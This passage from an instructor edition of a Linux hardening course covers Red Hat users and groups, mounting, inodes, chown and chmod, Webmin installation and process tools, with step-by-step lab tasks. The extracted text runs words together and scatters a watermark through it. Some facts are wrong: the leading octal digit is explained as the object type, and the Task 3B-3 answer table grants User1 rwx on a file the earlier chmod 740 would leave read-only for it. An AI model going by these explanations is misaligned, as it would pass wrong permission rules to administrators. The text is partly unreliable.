12. Change to the lab2 directory by using the cd command.

13. View the contents of the directory by using the ls command.

14. Change back to the lab1 directory.

15. Enter mv /lab1/file1 /lab2 to move the file from one directory to the other.

16. View the contents of the directory.

17. Change to the lab2 directory, and verify that it contains both files.

18. Enter rm file2 to delete (remove) a file. When you are prompted to confirmthe removal, enter y.

19. View the contents of the directory.

Lesson 3: Hardening Linux Computers 145

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 199: SCNP Hardening

User and Group AccountsAs with any other modern OS, the person managing the system will need to cre-ate user and group accounts for the individuals that require access to theresources of the system. Linux is no different in this regard. User accounts andgroup accounts are required, and there are several methods that you can use intheir creation.

User accounts might be used by individual people accessing the system, or theymight be used by logical access (or system access). Regardless of whether or notthe user account is for a person, or a system process, it will be assigned a UserID (UID) and a Group ID (GID).

Groups are the logical grouping of users that have similar requirements, such asthe need for similar file permission assignments. Upon creation, each user accountwill have a primary group associated with it. When a user account is created, agroup of the same name is created, and the user account is the sole member ofthat group.

In Linux, you can see the current user list by looking at the /etc/passwd file. Aswe continue farther into this lesson, this file might change, so at this time, youare looking at a default /etc/passwd file. Figure 3-4 shows an example of this file.

Figure 3-4: The default /etc/passwd file on a Linux computer.

146 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 200: SCNP Hardening

In the /etc/passwd file, there are several fields, separated (or delimited) by acolon. These fields describe the individual user account. The following listexplains each of these fields:

• User Account Name: This is the login name for the user account.

• Password: This is the login password for this user account. If the only thingthat is on screen is an X, then the password is protected in a shadow pass-word file. (Shadow passwords are discussed later in this lesson.)

• User ID: This is a numerical identifier assigned to each user account uponcreation. This is sometimes referred to as the UID.

• Group ID: This is the numerical identifier associated with the home group towhich the user belongs. This is sometimes referred to as the GID.

• Full Name: This might be the full first and last name of the user.

• Home Directory: This is the default current directory at login time for thisuser account.

• Shell: This is the command interpreter that will load when the user logs intothe Terminal interface. If the user logs into the GUI, then this is the shellthat loads at the Terminal.

In Linux, user and group accounts are assigned easy-to-remember and easy-to-manage names for the benefit of the users and administrators. To the computer,the significant variables are not the human-readable names, but the numericidentifiers. When a new user is created, it will be assigned the first available UIDand GID, starting at 500. The UID and GID numbers increase by one for eachnew user account created.

Standard Users and GroupsIn the Red Hat distribution of Linux, several default user accounts, called stan-dard users, are created during the installation of the OS. These accounts havedefault UID, GID, home-directory, and shell values. Figure 3-5 shows several ofthese standard users.

Figure 3-5: Several of the standard user accounts on a Red Hat Linux machine.

Lesson 3: Hardening Linux Computers 147

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 201: SCNP Hardening

The standard accounts can be found in the /etc/passwd file, just as any otheraccount. These are examples of the system accounts, versus the user accountscreated for individual access. In addition to the standard user accounts, severalstandard groups are also created upon installation. These groups can be found inthe /etc/group file. Figure 3-6 shows several of the standard groups.

Figure 3-6: Several of the standard groups on a Red Hat Linux machine.

Adding Users and GroupsYou can add users and groups to Red Hat Linux from within a Terminal sessionor from within the GUI. The basic command for adding a user is useradd, fol-lowed by the group, then the account name. The new account is locked until youassign a password or configure the account so that the user must assign a pass-word during the first login. So, in the following command sequence, a useraccount called Linux1 is added to the Users group, with a password of qwerty:

useradd -g Users Linux1passwd Linux1New password: qwertyRetype new password: qwerty

This simple syntax can be used to add a user quickly to the system. Severalswitches can be used during the creation of the account. Two of note, at this time,are the -d and the -s switches.

• The -d switch enables you to specify a home directory. If no directory isspecified, the user will be assigned a default home directory in the form of/home/useraccountname; for instance, for a user called jkmack, the defaulthome directory would be /home/jkmack.

• The -s switch enables you to assign a shell to this user. If no shell is speci-fied, the user will be assigned the default shell of /bin/bash.

148 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 202: SCNP Hardening

If you want to add a group to the system by using the command-line syntax, usethe groupadd command. With this command, you create the group and the GID atthe same time. The switch for defining the GID is -g. If you do not define a GIDduring the creation of the group, the system will assign the next available numberto the group. So, the following command creates a group called SCNP_Admins,with a GID of 1024:

groupadd -g 1024 SCNP_Admins

Although the command-line method for adding user and group accounts is useful,many administrators are starting to become more comfortable with using the GUItools that are available. In Red Hat, the GUI tool for adding and working withuser and group accounts is called User Manager. To run User Manager, click theMain Menu, then choose System Settings→Users And Groups.

Figure 3-7: Red Hat Linux User Manager, showing user accounts.

In User Manager, you can see all the user accounts in the system, along withtheir configurations. If you want to see all the system accounts as well, choosePreferences, and clear the option to filter system users and groups. Selecting theGroups tab enables you to see the group accounts on the system.

Adding a new user in the User Manager is a straightforward process. Once youclick the Add User button, simply fill in the fields, and click OK. If you want tochange the properties of a user account, select the user account, then chooseFile→Properties. There are four tabs to manage for the user account. They aredescribed in the following list:

• User Data—This tab is where the primary data is located, such as user name,full name, password, and home directory

• Account Data—This tab provides the option to set the account as locked outor to create an expiration date for the account.

• Password Info—This tab shows when the password was last changed, andcan be used to set a limit, in days, before a password change is required.

• Groups—This tab lists the groups that the user belongs to, along with theuser’s primary group.

Lesson 3: Hardening Linux Computers 149

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 203: SCNP Hardening

Adding a new group in User Manager is similar to adding a user account. Onceyou click the Add Group button, define the group name and GID, if desired; oth-erwise, the system will assign the next available number for the GID. Once thegroup is created, you can add users to the group by selecting the group andchoosing File→Properties.

Figure 3-8: Red Hat User Manager, showing group accounts.

TASK 3A-2Creating and Modifying Users and Groups

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. Enter useradd -g users User1 to create a user account with the name User1.Enter passwd User1 to unlock the account and prepare to assign thepassword. When you are prompted to enter and retype the new password,enter 1resU

2. From the Main Menu, choose System Settings→Users And Groups to openUser Manager.

3. Verify the existence of the new user account. Check the UID assigned.

4. Switch to the Terminal Window, and enter usermod -u 507 User1 tochange the UID to number 507.

5. Return to User Manager, click Refresh, and verify that the UID haschanged.

6. Switch to the Terminal Window, and enter groupadd -g 510 Testers tocreate a group called Testers, with a GID of 510.

150 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 204: SCNP Hardening

7. Switch to User Manager, select the Groups tab, and verify that theTesters group is displayed and that the GID is 510. You might need toclick the Refresh button to see the change.

8. Switch to the Terminal Window, and enter groupmod -g 515 Testers tochange the GID.

9. Switch to User Manager and verify that the GID has changed for theTesters group.

10. Select the Testers group, click the Properties button, and select theGroup Users tab.

11. Check User1, then click OK to add the User1 user account to the Testersgroup.

12. Close User Manager. You will use the Terminal Window in the next task.

Switching User AccountsThe root account must be secured, as it is the one account that has the ability totake complete control of the computer. Any intruder that gains root access hasessentially taken control of the computer away from you. For this reason, the rootaccount must be protected at the highest level. You should only log in as rootwhen absolutely required; such as to modify system files or to manage serviceson the computer.

There are, however, applications that require root-level access to run. So, if youhave an application you want to run, while administering the machine and thenetwork, what are you to do, if you shouldn’t log in as root? The answer is touse the Substitute User command for that specific moment.

The Substitute User (su) command can be run to execute a shell as a differentUID and GID than the user you are currently logged on as. The command is sim-ply su <username>. So, if you want to log in as root, use the command suroot. You will need to provide the correct password for the root account to gainaccess; the command alone does not grant access.

Linux File SystemLinux, just as any other operating system, has a method for organizing the infor-mation held in files and directories. In Linux, the file system is viewed in adifferent regard than in Windows. The Linux file system is a combination of allpartitions, directories, storage devices, and files. Storage media are not outsidecomponents of the file system; they are to be added as an integral part of the filesystem, and removed when no longer required.

This is considered a unified file system, where parts of the file system can resideon different, and unique, physical media. Figure 3-9 shows the unified file systemof a Linux computer.

The Unified File System ofa Linux Computer

Lesson 3: Hardening Linux Computers 151

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 205: SCNP Hardening

Figure 3-9: The unified file system of a Linux computer.

One thing you may notice right away is that there are no drive letters in the filesystem. The drive letters that are assigned to partitions in Windows do not existhere, so there is no C drive, D drive, and so on. In Linux, for a partition to benoticed by the system, the system must be told of the existence of the partition,but files are not accessed based on the physical structure of the drive. All files areaccessed in the logical, unified file system.

Another difference that Windows users will notice is that there is no concept ofthe 8.3 file naming convention that many are used to using. Linux files can havefile names up to 256 characters, and they are case-sensitive. Therefore, thesethree words represent three different files: FILE, File, file. It is also not uncom-mon for Linux files to have what appear to be multiple extensions. A commonexample of this would be scp_file.tar.gz.

Disks and PartitionsNow that you have been introduced to the concept of the logical unified file sys-tem, you need to examine the structure of physical disks, and how Linux viewspartitions. Hard disk drives and floppy disk drives have predefined device namesin Linux. The following table shows the Linux location and description of thepredefined devices.

Location Description/dev/hda First (Primary) IDE hard disk drive/dev/hdb Second (Secondary) IDE hard disk drive/dev/sda First SCSI hard disk drive/dev/sdb Second SCSI hard disk drive/dev/fd0 First floppy disk drive/dev/fd1 Second floppy disk drive

Device Names andLocations

152 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 206: SCNP Hardening

As previously mentioned, Linux does not use partitions as Windows operatingsystems do. There are no assigned drive letters for partitions. In Figure 3-10, youwill see that there are two hard disks, each with a partition defined. Disk 1 is thephysical storage for several of the directories, and Disk 2 is the physical storagefor other directories.

Figure 3-10: Partition structure in the unified file system.

Users of this computer will not be able to identify the two disks when they arelooking at the contents of the root directory. The only place where the physicalstructure is visible will be in the /dev directory. In this directory, the hard disksand partitions are defined as shown in this table.

Location Description/dev/hda1 First hard disk, first partition/dev/hda2 First hard disk, second partition/dev/hdb1 Second hard disk, first partition/dev/hdb2 Second hard disk, second partition

Mounting DevicesDevices in the Linux file system are found in the unified file system just as anyother object that needs to be accessed. However, in order for these devices to beaccessed, they must be mounted. Mounting of a device is the process of makingthat device available to the file system.

For example, suppose you wanted to access a CD-ROM. You would first need tomount the CD-ROM drive to the file system. To do this, use the mount command,as shown here:

mount /dev/cdrom /mnt/cdrom

If you were to enter this command, you would see the following output:

Mount: block device /dev/cdrom is write-protected. mountingread-only

Partition Structure in theUnified File System

Lesson 3: Hardening Linux Computers 153

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 207: SCNP Hardening

Using the mount command as shown will allow the device /dev/cdrom to beaccessed in the /mnt/cdrom directory, using the unified file system. The outputresponse is indicating the device has been mounted, and is listed as a read-onlydevice.

Because the structure of the file system is logical, you can change the defaultnature of mounting devices as described. For example, the default action ofmounting a CD-ROM drive is to have the mount point be /mnt/cdrom. However,if you wanted to change this, you could. If you wanted the CD-ROM to beaccessed right off the root directory, you could add a directory and point theCD-ROM device to that directory. The following commands are all that will berequired to make the CD-ROM accessible in this manner:

mkdir /cdrommount /dev/cdrom /cdrom

Using these two commands, you will be able to access the contents of aCD-ROM disc at the /cdrom prompt. If you want to change the location of adevice that has been previously mounted, you first need to unmount that device.To unmount a device, such as the CD-ROM drive, use the umount command, asshown here:

umount /dev/cdrom

InodesEvery file in the file system is described by a block of data called an inode. Youwill see inode defined as both Information Node, and Index Node, based on thetext you are reading. Here, we will refer to it simply as inode. Similarly, althoughon a larger scale, the entire file system is described by a block, known as thesuper block. The super block contains information about the file system, includingthe overall size of the file system and the number of inodes.

This section focuses on the inode of an individual file, and its structure. The datain a file’s inode contains the following:

• File access and type information, otherwise known as the mode.

• File ownership information.

• Time the file was last modified.

• Time the file was last accessed.

• Time the inode itself was updated.

• File size in bytes.

• File address in physical blocks.

In the list of items in the inode, you will not find the file name and directorylocation. Those pieces of information are found in the directory itself, whichmaps file names to inodes. All that the file system is concerned with is the inodenumber associated with a file; the name is somewhat irrelevant.

The number of an inode is associated when a file is first saved to a block on thefile system. During formatting, blocks of equal size are created, each with anassociated number for identification.

To view the inode numbersassociated with files, you use

the ls -i command.

154 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 208: SCNP Hardening

File StructureEarlier you used the ls command to list the contents in a directory. You mighthave noticed much more information than just the file name in the output fromthis command. All files in Linux are associated with a user and a group. Take thefollowing file example:

-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt

You might assume that the output was created from issuing the ls -l firstdoc.txtcommand. Remember that the -l switch on the ls command shows the completelisting for the object; in this case, the firstdoc.txt file.

Here is a breakdown of what the output is defining (the description of the field,followed by the output in the example):

• File Access Permission: -rwxrw-r--

• Number of Links: 1

• File Owner: User1

• Group: Testers

• File Size (bytes): 512

• Last Modification Date: Oct 24

• Last Modification Time: 19:42

• File name: firstdoc.txt

Although the permissions will be discussed in detail later, at this moment there isone section of the File Access Permissions that will be detailed. The first charac-ter of the permissions is not technically a permission; rather, it has a specialmeaning. The first character can define any one of the following:

• If the first character is a dash (-), then the object is a normal file.

• If the first character is the letter d, then the object is a directory.

• If the first character is the letter l, then the object is a symbolic link toanother file.

• If the first character is the letter b, the object represents a block device, suchas a disk drive.

• If the first character is the letter c, the object represents a character device,such as a serial port.

A symbolic link is a link that points to another file, similar to a Windowsshortcut. A symbolic link does not contain data; it only refers to another targetfile, in another location. The other location can be on the same computer, or onanother machine entirely across the network. The following two lines show how asymbolic link can be used. The first line is the link, which points to the file foundon the second line. Accessing the link on the first line will display the file of thesecond line.

lrwxrwxrwx 1 User1 Testers Oct 24 19:42 sales -> march.tar-rwxrw-r-- 1 User1 Testers 2048 Oct 24 19:42 march.tar

Lesson 3: Hardening Linux Computers 155

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 209: SCNP Hardening

TASK 3A-3Viewing File Details

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. If necessary, change to the lab2 directory.

2. Enter ls -l to view the details of the file you made earlier.

3. Observe the structure of the file in the directory, paying particularattention to the owner, group, access times, and file size.

Object OwnershipAs you saw in the file structure, every file has an associated group and a fileowner. By default when you create a new file in your home directory, you will bethe owner, and your primary group will be the assigned group for that file. Theremay be instances, however, where you will need to change the owner of anobject, such as file, to allow for others to manage the object.

The only user account that can change the ownership of a file is the root account.In addition to changing a file’s ownership, the root account can change the own-ership of a directory. The command for changing the ownership of a file ischown <new owner> <filename>. So, in the following example, a filecalled payroll.doc is having the user account vp_finance assigned as the newowner:

chown vp_finance payroll.doc

If you want to assign a new group to the object, the command is similar. Theonly difference is to add the user account, then a decimal point and the group. Inthe following example, the file called payroll.doc is having the user accountvp_finance and the group account accounting assigned as the new owners:

chown vp_finance.accounting payroll.doc

In the event that the requirement is to change the ownership of a directory, andall the files or directories inside that directory, then the command is chown withthe -R switch. The first example will change the ownership of the /marketing/June directory to have the marketing group as the owner and vp_marketing as theuser. The second example does not change the user of the object, but changes thegroup:

chown -R vp_marketing.marketing /marketing/Junechown -R .marketing /marketing/June

After the previous command has been entered, then all files and directories in the/marketing/June directory will have the marketing group as the group owner. Tochange the group ownership of a file or a directory if you are not the rootaccount, you can use the chgrp command; however, in order to use this com-mand, you must belong to both the current group that has ownership and thegroup to which you want to assign the ownership.

156 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 210: SCNP Hardening

WebminAlthough you will most likely become quite comfortable, if you are not already,with managing your Linux machine from the Terminal Window and in the GUI,there is another administrative tool that is available for you to use. The tool iscalled Webmin.

Webmin is a Web-based graphical interface for managing and making systemadministrative changes. Any Web browser that supports tables and forms willwork for this tool. By using Webmin, you can change to user accounts, configurefile sharing, manage DNS, and more. Figure 3-11 shows a simple layout ofWebmin, once the user has logged in.

Figure 3-11: Basic layout of Webmin.

Webmin is a freely available tool that can be found at www.webmin.com. In thiscourse, the version used is 1.020. Updates are available at the Webmin Web site,so you can update as you wish.

Lesson 3: Hardening Linux Computers 157

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 211: SCNP Hardening

TASK 3A-4Installing Webmin

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. Use the Nautilus File Manager to open your home directory. (From theMain Menu, choose Home Folder, or double-click the root’s Home icon onthe workspace.

2. Navigate to the / (root) directory.

3. Right-click the open space, and choose New Folder.

4. Name the new folder Webmin.

5. Copy the Webmin Tarball or RPM to the new /Webmin directory. Yourinstructor will provide the location of the Webmin installation file.

6. Switch to the Terminal Window, and change to the new directory usingthe cd /Webmin command.

7. Follow your instructor’s directions to install Webmin. When you haveaccepted all of the default answers, the system should report a successfulinstallation.

A default installation of the Webmin RPM sets the login name and passwordto root’s login credentials, while a default installation of the Tarball sets thelogin name as admin and the password as blank, or null.

8. Test Webmin by opening a Web browser. The Web browser is the globeicon next to the Red Hat Main Menu icon.

9. In the Browser address bar, enter http://localhost:10000, and press Enter.

10. In the login screen that is displayed, enter the login credentials forWebmin. This should be admin and no password, if you performed thedefault Tarball installation, or root’s credentials, if you performed the defaultRPM install.

11. In the Confirm box, click No. In the Security Warning box, click Continue.

12. At this stage, make no configuration changes, but feel free to performsome basic navigation.

13. When you are done exploring Webmin, close the Webmin window, andclose the Nautilus File Manager.

System InformationThe last fundamental component of managing a Linux system that is discussed inthis topic is the issue of finding and viewing system information. When securingyour Linux system, you will want to know what processes are running, and howto identify those processes.

Allow students 5 to 10minutes to explore

Webmin.

158 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 212: SCNP Hardening

Process IDsEvery executable file on the computer can be thought of as a program. When aprogram is executed this is referred to as a process. On a Linux system, associ-ated with each process is a unique numeric identifier known as the ProcessIdentifier (PID). Users can create processes, control the execution of a process,and even receive notification if the processes’ execution status changes.

Viewing the System InformationThere are several commands that you can run to display and analyze the perfor-mance of a system. Two of these commands are ps and top. By using thesecommands, you can identify running processes, the amount of CPU time a pro-cess is taking, the user account associated with the process, the amount ofmemory a process is taking, and more. Figure 3-12 shows what the ps commandoutput looks like.

Figure 3-12: The basic information provided by the ps command.

Although the above information is useful and provides solid data, there might betimes when you are looking for a higher level of detail. In that case, you can usethe ps command with aux. The ps aux command lists all the processes on thesystem, including the user account associated with each process. Figure 3-13shows what the ps aux command output looks like. In the ps aux command, auxprovides:

• a—All processes

• u—Additional user information

• x—Extended process listing

The ps command identifiesthe processes running by thecurrent user, while ps auxidentifies all runningprocesses.

Lesson 3: Hardening Linux Computers 159

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 213: SCNP Hardening

Figure 3-13: Running the ps aux command shows more detailed information than the pscommand alone.

Using the ps command shows the processes and other data in a snapshot whenthe command is run. In many instances, this will provide the exact informationthat you were looking for. If, however, you are trying to see the processes run-ning interactively, you will need to use the top command. By default, the topprogram updates the screen every second. If you wanted to increase the intervalto every 7 seconds, for example, you would use the command top d 7. Thereare additional functions available while running the top program—to see the listof what is available, press the H key while top is running.

By now, you should be comfortable with the fact that in Red Hat Linux, there areoften several ways to complete a task, namely the command-line tools and theGUI tools. There is also a tool available in the GUI that can display system infor-mation interactively. This tool is called System Monitor. System Monitor allowsyou to select columns to sort data, in either ascending or descending order.

160 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 214: SCNP Hardening

Figure 3-14: Running the System Monitor in Red Hat Linux.

One other piece of system information that you might want to identify is the diskspace used. To view a report on the system’s use of allocated disk space, you canuse the df command. Entering df in a Terminal Window shows disk-spaceinformation. The default view shows the disk information in 1-K blocks. To viewthe information in GB and MB units, use the -h option, as shown in Figure 3-15.

Figure 3-15: Viewing disk-space allocation on a Linux system by using the df -hcommand.

Lesson 3: Hardening Linux Computers 161

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 215: SCNP Hardening

TASK 3A-5Viewing System Information

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. Enter ps to view the current processes.

2. Enter ps aux to view the full list of all processes.

3. Enter top to view the processes interactively.

4. While top is still running, press H to look at the available functions in top.

5. Close all Terminal Windows.

6. From the Red Hat Main Menu, choose System Tools→System Monitor.

7. Scroll through the System Monitor options, comparing them to the ter-minal commands you just used.

8. When you have completed your review, close System Monitor.

9. Open a Terminal Window.

10. Enter df -h to view information about the disk space.

11. Close the Terminal Window.

Topic 3BFundamental Linux SecurityIn Linux, basic security measures consist of file system security, password secu-rity, and authentication methods. Let’s begin by looking at file system security.

File and Directory PermissionsIn Linux, when you log in to the system, you are identified by your user account.In addition to your user account, you might belong to a group or groups. A filecan have permissions set for a user account, a group, and a category calledothers. If you are accessing an object and you are not the owner of the file (usu-ally the creator of the file) or in the group that has access, then you areconsidered to be one of the others.

Earlier, you were introduced to the information provided when viewing a file’sdetails. This included the permissions for that file. Remember that every file hasan owner and a group. Previously, you looked at a file whose details were:

-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt

In this line, the firstdoc.txt file has permissions of: -rwxrw-r--

File and DirectoryPermissions

162 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 216: SCNP Hardening

Now, for users of Windows operating systems, this will take a bit of getting usedto, but the permission structure is logical. Look at the following other fileexamples:

-rwxrwxrwx 1 User1 Testers 512 Oct 9 sample.txt-rw-r--r-- 1 User2 Newbies 1024 Oct 10 test.tardrwxr-xr-- 1 User3 Finance 2048 Oct 11 15:26 DB_3

In these examples, notice that the first part of each line has a different listing ofthe permissions, and that the third example object is a directory (you can tellfrom the letter d as the first character). You can consider the permissions to bedefined in columns.

The permissions are broken into the object (such as file or directory), user per-missions, group permissions, and others permissions. Looking at the previousfirstdoc.txt example, this breaks down into the following (divided here by thepipe symbol so that you can easily see the divisions):

- | rwx | rw- | r-- |

The first column is a single character (in this case a dash, which represents astandard file), and is the only column that is not three characters in length. Thesecond column represents the permissions for the user (owner), the third columnrepresents the permissions for the group, and the fourth column represents thepermissions for the others. The user’s permission (User1 in this example) is listedas rwx, the group’s permission (Testers in this example) is listed as rw-, and theother’s permission is listed as r--.

Files and directories have four permission types. They are Read (R), Write (W),Execute (X), and No Permission (-). These permissions vary slightly from files todirectories. The Read permission for files grants the ability to open and read afile’s contents; for directories, the Read permission grants the ability to list thefiles in the directory. The Write permission for files grants the ability to modify(add, delete, or change) a file’s content; for directories, the Write permissiongrants the ability to add or remove files or links in the directory. The Executepermission for files grants the ability to execute the file (or to run the exec com-mand); for directories, the Execute permission grants the ability to changedirectories to subdirectories. The No Permission permission is applied only tofiles, and denies access to the file.

Before moving further into the permissions, we must spend a moment on numberconversions. The permissions in Linux use octal numbers, which is a base-8counting system. The octal system can represent 8 unique numbers, which mightbe listed in binary. The following table is a quick refresher on binary-to-octalconversions.

Binary Number Octal Equivalent000 0001 1010 2011 3100 4101 5110 6111 71000 10

Lesson 3: Hardening Linux Computers 163

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 217: SCNP Hardening

For each permission (user, group, and others), there are three possible characters:r, w, and x. These permission characters are always in this order. If a permissionis granted, then a 1 is assigned to that character space. If a permission is notgranted, then a 0 is assigned to that character space. Let’s use the permissions ofthe firstdoc.txt as an example. The permissions were -rwxrw-r--

The first character is blank, therefore this is a file. The user permission is rwx,the group permission is rw-, and the others permission is r--. This can also beviewed as user permissions of 111, group permissions of 110, and others permis-sions of 100. The following table shows the conversions, from octal to binary topermissions.

Octal Number Binary Equivalent Permissions0 000 ---1 001 --x2 010 -w-3 011 -wx4 100 r--5 101 r-x6 110 rw-7 111 rwx

Using this table, you can see that if you want to assign the permission of Read(r), and no other permission, then octal 4 is the permission to assign. Likewise, ifyou want to assign the permission of Read, Write, and Execute (rwx), then octal7 is the permission to assign. As a final example, if you want to assign the per-mission of Read and Write (rw), then octal 6 is the permission to assign.

Although you might end up memorizing the permission list shown, there isanother method of arriving at the octal values. From your experience with binarynumbers, you know that the three values listed are decimal 4, 2, and 1. Becausethe permissions are always defined as r, w, and x (in that order), you can alsoassign decimal values to these permissions. The Read permission is always on theleft, the third character in binary, and can be assigned a decimal value of 4. TheWrite permission is always in the middle, the second character in binary, and canbe assigned a decimal value of 2. The Execute permission is always on the right,the first character in binary, and can be assigned a decimal value of 1.

Therefore, the following is always true: Read = 4, Write = 2, and Execute = 1.Using this method, if you want to assign Read and Write permissions, simply add4 + 2, to get 6. Compare that to the previous list, verifying the octal, binary, andpermissions do indeed match. You will see how this system works, and how itcan be very efficient.

Using the octal system for setting permissions creates values such as 0400, or0440, and more. These four numbers represent the four columns of permissionsdescribed earlier. At this time, the first number will always be 0, as that is thecharacter that defines the type of object (such as a file, a directory, or a link).Due to this, it is not uncommon for the leading 0 to not be listed. This wouldmake the previous two permission examples simply 400 and 440.

164 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 218: SCNP Hardening

An overall permission of 400 means that the user is given a permission of 4, thegroup a permission of 0, and the others a permission of 0. An overall permissionof 440 means the user is given a permission of 4, the group a permission of 4,and the others a permission of 0. As a final example, an overall permission of774 means the user is given a permission of 7, the group a permission of 7, andthe others a permission of 4.

Setting PermissionsThere are two methods of working with the permissions of an object. Onemethod uses octal numbers, and the other uses permission strings. When settingpermissions by using a string, you must decide three primary questions. They are:

1. Whom will this permission affect? (u) User, (g) Group, (o) Others, (a) All

2. What permission will be set? (r) Read, (w) Write, (x) Execute, (s) SetUID orSetGID, (t) Sticky Bit

3. What type of action is to be taken? (+) Addition, (-) Removal

Look at the following examples to see how these three questions, given answers,work together to create the permission string:

• If you want to allow the group to have Read access, the string is g+r

• If you want to allow the owner (user) to have Read and Write access, thestring is u+rw

• If you want to allow all (every user) to have Read and Execute access, thestring is a+rx

The chmod CommandThe command to use to change permissions is chmod (Change Mode). Withchmod, you can use either the octal method or the string method. The followingtwo examples show chmod being used with each method. These permissions aregiving the user Read, Write, and Execute permissions, the group Read, Write, andExecute permissions, and the others Read permission.

chmod 774 vacation_pictures.tar.gzchmod u+rwx,g+rwx,o+r vacation_pictures.tar.gz

The following example shows these methods used to change the permissions on adirectory. In this example, the directory is called /database/Feb. The first twolines are examples of setting the permissions for everyone to have full access tothis database. The second two lines add the -R option, which allows the changedpermission to apply to all files and subdirectories in the directory. The secondtwo lines are giving the directory Read, Write, and Execute permissions to theuser and owner, and Read to others.

chmod 777 /database/Febchmod a+rwx /database/Febchmod -R 774 /database/Febchmod -R u+rwx,g+rwx,o+r /database/Feb

In the following task, you will create four user accounts, who are part of twogroups. You will then create four files and two directories. Finally, you will con-figure the ownership of these objects, and verify the new ownership.

Lesson 3: Hardening Linux Computers 165

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 219: SCNP Hardening

TASK 3B-1Creating Object Ownerships

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. Use either the Terminal Window or the Red Hat User Manager to createthe following list of users and groups, and assign the users to thegroups. For each user, the password is qwerty.

a. User1, GroupA

b. User2, GroupA

c. User3, GroupB

d. User4, GroupB

2. Use either the Terminal Window or the Nautilus File Manager to createthe following files and directories:

a. /Marketing/Campaign.txt

b. /Marketing/Tracking.txt

c. /Research/Software.txt

d. /Research/Development.txt

3. In the Terminal Window, check the current ownership and permissionsfor the Marketing directory by using the ls -l /Marketing command.

4. Check the current ownership and permissions for the Researchdirectory.

5. Change directories to the Marketing directory.

6. Enter chown User1.GroupA Campaign.txt to change the ownership ofCampaign.txt.

7. Change the ownership of Tracking.txt to User2.GroupA.

8. Change directories to the Research directory.

9. Change the ownership of Software.txt to User3.GroupB.

10. Change the ownership of Development.txt to User4.GroupB.

11. Check the current ownership and permissions for the Marketingdirectory.

12. Check the current ownership and permissions for the Researchdirectory.

13. Change directories back to /root.

14. From root, change the ownership of the Marketing directory by using thechown -R .GroupA /Marketing command.

15. Change the ownership of the Research directory to GroupB.

You can either delete theexisting User1 and create a

new one, or modify theproperties of the existing

one.

166 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 220: SCNP Hardening

Assigning PermissionsOnce you have created the objects described in the previous task, you have thepieces in place to create the permission structure. You are going to create permis-sions that allow members of Group A to have access to the Marketing folder,with User1 accessing the Campaign.txt document. User2 will be given access tothe Tracking.txt document. User3 will be given access to the Software.txt docu-ment, and User4 will be given access to the Development.txt document.

TASK 3B-2Assigning Permissions

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. Change to the Marketing directory.

2. Enter chmod 740 Campaign.txt to assign the permissions to Campaign.txt.

3. Enter chmod 740 Tracking.txt to assign the permissions to Tracking.txt.

4. Change to the /root directory.

5. Enter chmod -R 770 /Marketing to assign the permissions to the Marketingdirectory.

6. Change to the Research directory.

7. Enter chmod u+rwx,g+rwx Software.txt to assign the permissions toSoftware.txt.

8. Enter chmod u+rwx,g+rwx Development.txt to assign the permissions toDevelopment.txt.

9. Change to the /root directory.

10. Enter chmod -R 770 /Research to assign the permissions to the Researchdirectory.

Testing Assigned PermissionsAt this stage, you have created four users, two groups, four files, and twodirectories. You then assigned the users to their groups, and assigned permissionson the files and directories. Next, you will test the permissions by logging in asthe four users (using the substitute user command) and attempting to access allfour files. It is recommended that you take advantage of the Workspace Switcherin this task, because it lets you have one workspace open for each user.

Lesson 3: Hardening Linux Computers 167

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 221: SCNP Hardening

TASK 3B-3Verifying Permissions

Setup: You are logged on to Red Hat 8 as root, and a Terminal Win-dow is open.

1. In the Terminal Window, enter su - User1 to switch to the User1 account.

2. Attempt to access all four files from the previous task.

3. Identify which ones you can access, the level of access (by trying to cre-ate a file, for example), and the ones you cannot access.

File Name Access Granted?Level of AccessGranted

/Marketing/Campaign.txt Yes rwx/Marketing/Tracking.txt Yes rwx/Research/Software.txt No None/Research/Development.txt No None

Verify that the access is correct based on the permissions you assigned inthe previous task.

4. Activate the Workplace Switcher, and click any open space to switch toanother workspace.

